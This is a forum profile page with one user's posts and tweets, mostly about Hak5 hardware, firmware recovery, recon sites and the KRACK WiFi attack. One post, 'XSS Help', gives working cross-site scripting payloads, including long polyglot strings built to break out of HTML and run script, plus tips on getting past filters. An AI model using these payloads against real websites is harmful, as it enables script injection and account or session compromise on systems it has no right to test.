zoro25

Everything posted by zoro25

  1. @nest are there plans to link facial recognition to https://t.co/hEW9dj8Cuz it seems backward that I have to relink… https://t.co/nRpvfOP2NQ

  2. A Krack module would be nice - - - -just putting it out there
  3. @firt @kickstarter @elonmusk Been there and had the same thing happen, @kickstarter won't do anything, In my case,… https://t.co/wtR4kI6fKI

  4. Just saw that you already mention Builtwith. That's who I use to profile things like this. https://builtwith.com/hak5.com They also have a browser plugin. It's very easy to use their API or just scrape for an app you would write yourself. I also use TCPIPUtils for looking up networking info (subdomains etc.) https://www.tcpiputils.com/browse/domain/hak5.com I then also do a few other things, but Builtwith and TCPIPUtils are my main 2.
  5. zoro25

    XSS Help

    Also, I would suggest looking in the console of your browser for errors when injecting. As already mentioned, without knowing the app or the js/html of the page it's hard to give a working payload.

    However, you can try either

    -->'";</ScriPT><sCriPt><confirm()</scRiPt>

    which may better break out of the HTML and is nice and short (similar to what you tried, but I included single and double quotes and also the end of a comment, just in case you end up in a comment section).

    Or you can try a polyglot injection payload (these will usually set off a WebApp Firewall, but feel free to try):

    javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

    Or

    jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

    which are both attempting to do the same thing. Good luck.

    ***** EDIT While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image. This is the equivalent of <img src="x" /> From here you would just need to tweak the code to pop an alert on a broken image; remember to read the console and attempt to bypass protections. onerror=confirm() or something similar for a basic pop on a broken image. ****
  6. @CrookdHillary @MatthewKick No idea where you get your 0-6months as Cornell law , https://t.co/tPgUmFHu6X states 5 years max

  7. @testertested Never feel bad about screwing up, we all that (in one way or another). The fact that you realized it… https://t.co/syGpmMyjPX

  8. @mattbarcomb I've worked at 3 companies where this is encouraged @CPM__UK @Microsoft & @Skype, 1 of the 54 likes th… https://t.co/2S6ycD1qvk

  9. I think you guys are missing the R&D costs. If you look at Seytonic, he pushes (or sells) Malduino, but the Malduino uses DuckyScript as its language. Who invented DuckyScript? Hak5. Okay, so it's not massively hard to come up with a new simple scripting language or even using the Malduino for USB automation, but no one else did it in a small easy to use package. That's what Hak5 brings, ease of use and some resemblance of support (I say resemblance as most of the support is from the community so it's hit or miss). Sure you can do a lot of the pineapple stuff via a Linux OS with your network cards in promiscuous mode, but the Pineapples just give you a nice small package with which to carry out your engagement. Seytonic is great and his guides are awesome for those with less cash, but lots of Hak5 customers are businesses/Govt agencies or just people with a passion for security who don't mind paying a little extra for the community. Hak5 if anything has been a bit of a victim of its success, and its customer base grew massively over the last few years (pineapple5 onwards), and it seems only now the dev team is beginning to catch up to cope with that larger customer expectation. Bringing Seb in was a good start back at the start of Pineapple5, but he and Darren have always been swamped. For example, almost 2 weeks after the source for Kracked was leaked (openly available), which is the biggest thing to happen to WiFi in about 10 years, the Pineapples still haven't got modules/new firmware (in fact, while I'm on it, the firmware is over a year old). Let's hope with the larger dev team things get better.
  10. Does anyone know anything about that "Friday thing" mentioned in today's Hak5 video? Or what I'm guessing is a new Pineapple firmware release or at least a new Krack module ****EDIT**** (after watching it back it seems that the Friday thing may have been last week's Packet Squirrel announcement. I watched the recorded streams but didn't see anything new Pineapple or Krack related)
  11. @smartthings @nvidiashield Thanks for the clarification

  12. @Random_Robbie Good work ,

  13. @sxcurity Yes that's it, thanks

  14. Remember to say to yourself that this is just a moment and it will pass. Now may seem dark and gray but it will pa… https://t.co/FeUw2pNNUf

  15. @troyhunt Tipple Wammy :-(

  16. @SymbianSyMoh Here's another https://t.co/P9QIYRkntZ

  17. @indi303 @SteveD3 @nite0wl @ladymerlin @dontlook Sparrows is fairly decent , with good quality locks for learning (… https://t.co/lP9TB9jPvx

  18. +1 for Google Security team who 3 times now have closed my security holes before I got a chance to report them (damn they are quick)

  19. @disclosedh1 Mouse Over in Opera Browser will still show Ebay rather than the punycode URL - However this is a brow… https://t.co/up8KvvxbbJ

  20. @teroalhonen Windows Team PM, How can we reduce the number of blue screen error Windows Team Dev, Leave it to me ey… https://t.co/K1TbtDURFt

  21. I've now been put in contact with them, Thanks to all who helped :-)

  22. @jcran @Viss @r00tninja @jeremiahg @michenriksen Tool completed , after a long while it came back with Wrote 545 ho… https://t.co/6AnrJPGewr

  23. @lukasco 'foo' + 'foo' //string plus string "foofoo" 'foo' + + 'foo'//string plus plus string? "fooNaN" '5' + - '2'… https://t.co/jVnDRDS02T

  24. It never goes through the upgrade process, just goes straight from green to blinking blue. I'll try and do a recovery. **EDIT** All good after the recovery, device must have been in a weird state. For anyone else who gets the same issue, to fix it, insert and pull it out as soon as the green light turns off (do this 3 times); on the 4th insert it will go into recovery mode. Once this is done, remove the bunny (use the safe removal feature on Windows) and then, making sure that you still have the file in root, insert the bunny again and it will flash the new firmware. As LVT mentioned above, after the flash of new firmware you should have a text file called version.txt; inside should be 1.1_228. PS LowValueTarget, thanks for the help and advice above :-)